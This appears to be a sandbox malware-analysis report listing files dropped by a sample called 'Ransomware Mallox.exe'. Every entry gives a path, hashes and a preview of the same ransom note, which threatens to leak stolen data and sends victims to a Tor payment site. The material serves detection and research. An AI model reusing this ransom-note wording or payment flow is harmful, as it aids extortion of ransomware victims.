                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.PinningConfirmationDialog_cw5n1h2txyewy\Settings\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.PinningConfirmationDialog_cw5n1h2txyewy\SystemAppData\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.PinningConfirmationDialog_cw5n1h2txyewy\TempState\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\HLJZZSHQ\2\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\HLJZZSHQ\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\1SMD58P1\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\KZEB8G58\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\U65C71VL\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\WL7VHKL2\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCookies\ESE\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCookies\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetHistory\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\Content\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\MetaData\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
